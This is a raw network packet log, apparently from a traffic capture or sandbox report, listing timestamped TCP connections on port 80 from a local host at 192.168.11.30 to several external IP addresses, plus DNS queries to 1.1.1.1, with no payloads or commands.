                                                                                    Dec 4, 2023 12:09:22.253602982 CET4983080192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:22.254057884 CET4983080192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:22.436762094 CET804983091.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:09:22.436873913 CET804983091.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:09:22.437191963 CET4983080192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:23.758352995 CET4983080192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:24.774085045 CET4983180192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:24.956681967 CET804983191.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:09:24.956954002 CET4983180192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:24.957211971 CET4983180192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:25.140680075 CET804983191.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:09:25.140748024 CET804983191.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:09:25.140995979 CET4983180192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:26.460978031 CET4983180192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:27.476630926 CET4983280192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:27.658620119 CET804983291.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:09:27.658840895 CET4983280192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:27.659082890 CET4983280192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:27.840864897 CET804983291.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:09:27.841583967 CET804983291.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:09:27.841630936 CET804983291.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:09:27.841809034 CET4983280192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:29.163445950 CET4983280192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:30.179236889 CET4983380192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:30.361787081 CET804983391.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:09:30.362016916 CET4983380192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:30.362260103 CET4983380192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:30.545711040 CET804983391.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:09:30.545789003 CET804983391.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:09:30.546087980 CET4983380192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:30.546303034 CET4983380192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:30.728624105 CET804983391.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:09:35.552946091 CET4983480192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:35.837728024 CET8049834133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:35.837980032 CET4983480192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:35.838227987 CET4983480192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:36.124139071 CET8049834133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:36.129631042 CET8049834133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:36.129713058 CET8049834133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:36.129767895 CET8049834133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:36.130024910 CET4983480192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:37.349386930 CET4983480192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:38.364700079 CET4983580192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:38.651129961 CET8049835133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:38.651438951 CET4983580192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:38.651577950 CET4983580192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:38.936295033 CET8049835133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:38.940289974 CET8049835133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:38.940367937 CET8049835133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:38.940417051 CET8049835133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:38.940587997 CET4983580192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:40.160912991 CET4983580192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:41.176616907 CET4983680192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:41.461355925 CET8049836133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:41.461636066 CET4983680192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:41.461824894 CET4983680192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:41.746438980 CET8049836133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:41.746474981 CET8049836133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:41.752917051 CET8049836133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:41.758013010 CET8049836133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:41.758191109 CET8049836133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:41.758415937 CET4983680192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:41.758491039 CET8049836133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:41.758663893 CET4983680192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:42.972842932 CET4983680192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:43.988468885 CET4983780192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:45.003571033 CET4983780192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:45.289258003 CET8049837133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:45.413184881 CET8049837133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:45.413487911 CET4983780192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:45.413652897 CET4983780192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:45.698251963 CET8049837133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:45.701809883 CET8049837133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:45.753562927 CET4983780192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:46.038635969 CET8049837133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:46.039253950 CET4983780192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:46.039319038 CET4983780192.168.11.30133.130.64.24
                                                                                    Dec 4, 2023 12:09:46.324193954 CET8049837133.130.64.24192.168.11.30
                                                                                    Dec 4, 2023 12:09:51.049438953 CET4983880192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:51.232229948 CET804983891.195.240.117192.168.11.30
                                                                                    Dec 4, 2023 12:09:51.232458115 CET4983880192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:51.232829094 CET4983880192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:51.415908098 CET804983891.195.240.117192.168.11.30
                                                                                    Dec 4, 2023 12:09:51.415992022 CET804983891.195.240.117192.168.11.30
                                                                                    Dec 4, 2023 12:09:51.416341066 CET4983880192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:52.736344099 CET4983880192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:53.752074957 CET4983980192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:53.934555054 CET804983991.195.240.117192.168.11.30
                                                                                    Dec 4, 2023 12:09:53.934864044 CET4983980192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:53.935081959 CET4983980192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:54.118352890 CET804983991.195.240.117192.168.11.30
                                                                                    Dec 4, 2023 12:09:54.118443012 CET804983991.195.240.117192.168.11.30
                                                                                    Dec 4, 2023 12:09:54.118670940 CET4983980192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:55.438852072 CET4983980192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:56.454605103 CET4984080192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:56.637154102 CET804984091.195.240.117192.168.11.30
                                                                                    Dec 4, 2023 12:09:56.637475967 CET4984080192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:56.637703896 CET4984080192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:56.819917917 CET804984091.195.240.117192.168.11.30
                                                                                    Dec 4, 2023 12:09:56.820019960 CET804984091.195.240.117192.168.11.30
                                                                                    Dec 4, 2023 12:09:56.821301937 CET804984091.195.240.117192.168.11.30
                                                                                    Dec 4, 2023 12:09:56.821424007 CET804984091.195.240.117192.168.11.30
                                                                                    Dec 4, 2023 12:09:56.821698904 CET4984080192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:58.141439915 CET4984080192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:59.157305956 CET4984180192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:59.339963913 CET804984191.195.240.117192.168.11.30
                                                                                    Dec 4, 2023 12:09:59.340250969 CET4984180192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:59.340418100 CET4984180192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:59.522941113 CET804984191.195.240.117192.168.11.30
                                                                                    Dec 4, 2023 12:09:59.523042917 CET804984191.195.240.117192.168.11.30
                                                                                    Dec 4, 2023 12:09:59.523557901 CET4984180192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:59.523557901 CET4984180192.168.11.3091.195.240.117
                                                                                    Dec 4, 2023 12:09:59.705720901 CET804984191.195.240.117192.168.11.30
                                                                                    Dec 4, 2023 12:10:04.530896902 CET4984280192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:04.727061987 CET804984265.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:04.727289915 CET4984280192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:04.727556944 CET4984280192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:04.923513889 CET804984265.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:05.668194056 CET804984265.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:05.668289900 CET804984265.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:05.668349028 CET804984265.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:05.668406963 CET804984265.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:05.668463945 CET804984265.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:05.668519974 CET804984265.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:05.668584108 CET4984280192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:05.668790102 CET804984265.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:05.668885946 CET804984265.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:05.668905973 CET4984280192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:05.669111967 CET804984265.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:05.669159889 CET804984265.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:05.669207096 CET804984265.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:05.669298887 CET4984280192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:05.669462919 CET4984280192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:05.669462919 CET4984280192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:06.233319044 CET4984280192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:07.249087095 CET4984380192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:07.445528030 CET804984365.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:07.445801020 CET4984380192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:07.446028948 CET4984380192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:07.641952038 CET804984365.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:08.354362965 CET804984365.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:08.354464054 CET804984365.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:08.354533911 CET804984365.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:08.354598045 CET804984365.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:08.354655981 CET804984365.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:08.354712009 CET804984365.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:08.354731083 CET4984380192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:08.354814053 CET804984365.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:08.354980946 CET804984365.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:08.355038881 CET804984365.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:08.355091095 CET804984365.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:08.355139017 CET804984365.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:08.355293989 CET4984380192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:08.355632067 CET4984380192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:08.951529980 CET4984380192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:09.967068911 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:10.163019896 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:10.163310051 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:10.163456917 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:10.359343052 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:10.359436035 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.099560022 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.099658966 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.099730968 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.099797964 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.099854946 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.099915028 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.099981070 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.100035906 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.100094080 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.100112915 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:11.100112915 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:11.100112915 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:11.100198984 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.100267887 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:11.100379944 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.100435972 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:11.100608110 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:11.669662952 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:12.685345888 CET4984580192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:12.883121967 CET804984565.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:12.883589029 CET4984580192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:12.883680105 CET4984580192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:13.081331015 CET804984565.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:13.582057953 CET804984565.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:13.582125902 CET804984565.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:13.582561970 CET4984580192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:13.582748890 CET4984580192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:13.780692101 CET804984565.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:18.590766907 CET4984680192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:18.768743038 CET8049846162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:18.768992901 CET4984680192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:18.769345045 CET4984680192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:18.941579103 CET8049846162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:19.108680964 CET8049846162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:19.108721972 CET8049846162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:19.109639883 CET4984680192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:20.277091026 CET4984680192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:21.292718887 CET4984780192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:21.467494011 CET8049847162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:21.467788935 CET4984780192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:21.468019962 CET4984780192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:21.642091990 CET8049847162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:21.774564028 CET8049847162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:21.774633884 CET8049847162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:21.774892092 CET4984780192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:22.979613066 CET4984780192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:23.995203018 CET4984880192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:24.170097113 CET8049848162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:24.170469999 CET4984880192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:24.170696974 CET4984880192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:24.345103025 CET8049848162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:24.483431101 CET8049848162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:24.483561993 CET8049848162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:24.483756065 CET4984880192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:25.682104111 CET4984880192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:26.697793007 CET4984980192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:26.874269009 CET8049849162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:26.874521017 CET4984980192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:26.874689102 CET4984980192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:27.048723936 CET8049849162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:27.177002907 CET8049849162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:27.177083969 CET8049849162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:27.177506924 CET4984980192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:27.177664042 CET4984980192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:27.352539062 CET8049849162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:32.180959940 CET4985080192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:32.356997967 CET804985083.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:32.357254982 CET4985080192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:32.357433081 CET4985080192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:32.534682035 CET804985083.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:32.535037994 CET804985083.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:32.535121918 CET804985083.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:32.535454988 CET4985080192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:33.867861032 CET4985080192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:34.883435965 CET4985180192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:35.059844017 CET804985183.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:35.060142994 CET4985180192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:35.060317993 CET4985180192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:35.236402035 CET804985183.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:35.237930059 CET804985183.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:35.237997055 CET804985183.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:35.238333941 CET4985180192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:36.570214033 CET4985180192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:37.585985899 CET4985280192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:37.762377977 CET804985283.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:37.762608051 CET4985280192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:37.762887001 CET4985280192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:37.939177036 CET804985283.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:37.941420078 CET804985283.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:37.941488981 CET804985283.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:37.941761971 CET4985280192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:39.272852898 CET4985280192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:40.288398981 CET4985380192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:40.465481997 CET804985383.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:40.465826988 CET4985380192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:40.466039896 CET4985380192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:40.642050982 CET804985383.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:40.643599033 CET804985383.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:40.643672943 CET804985383.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:40.644097090 CET4985380192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:40.644722939 CET804985383.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:40.645136118 CET4985380192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:40.645251989 CET4985380192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:40.821533918 CET804985383.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:45.882450104 CET4985480192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:10:46.064380884 CET804985491.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:10:46.064707994 CET4985480192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:10:46.065005064 CET4985480192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:10:46.247556925 CET804985491.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:10:46.247622013 CET804985491.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:10:46.247997046 CET4985480192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:10:47.567886114 CET4985480192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:10:48.583518982 CET4985580192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:10:48.765336990 CET804985591.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:10:48.765578032 CET4985580192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:10:48.765856981 CET4985580192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:10:48.948324919 CET804985591.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:10:48.948394060 CET804985591.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:10:48.948632956 CET4985580192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:10:52.082360029 CET4985580192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:10:53.097875118 CET4985680192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:10:53.279947996 CET804985691.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:10:53.280209064 CET4985680192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:10:53.280410051 CET4985680192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:10:53.462445974 CET804985691.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:10:53.462507963 CET804985691.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:10:53.463102102 CET804985691.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:10:53.463188887 CET804985691.195.240.19192.168.11.30
                                                                                    Dec 4, 2023 12:10:53.463325977 CET4985680192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:10:54.784867048 CET4985680192.168.11.3091.195.240.19

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 4, 2023 12:03:14.253987074 CET6449853192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:03:14.349222898 CET53644981.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:03:15.773514986 CET5094053192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:03:15.886312962 CET53509401.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:03:36.738187075 CET4933453192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:03:36.987206936 CET53493341.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:03:52.254925966 CET5555553192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:03:52.536854029 CET53555551.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:04:06.017551899 CET5234353192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:04:06.401607037 CET53523431.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:04:20.217272043 CET6534053192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:04:20.331108093 CET53653401.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:04:33.526885986 CET6364453192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:04:33.736932039 CET53636441.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:04:47.227565050 CET5817453192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:04:47.719650984 CET53581741.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:05:01.724347115 CET5673453192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:05:01.862508059 CET53567341.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:05:15.345552921 CET5876053192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:05:15.783526897 CET53587601.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:05:29.826725006 CET5426953192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:05:30.072875977 CET53542691.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:05:43.683109999 CET5007353192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:05:44.114969969 CET53500731.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:05:57.601852894 CET6325853192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:05:57.730386972 CET53632581.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:07:28.566004992 CET5119253192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:07:28.770759106 CET53511921.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:07:42.265824080 CET5865953192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:07:42.492959023 CET53586591.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:07:50.545291901 CET5117853192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:07:51.204457045 CET53511781.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:08:04.886055946 CET6489253192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:08:05.044981003 CET53648921.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:08:18.148485899 CET6479253192.168.11.301.1.1.1
                                                                                    Dec 4, 2023 12:08:18.986912012 CET53647921.1.1.1192.168.11.30
                                                                                    Dec 4, 2023 12:10:45.646964073 CET5053153192.168.11.301.1.1.1
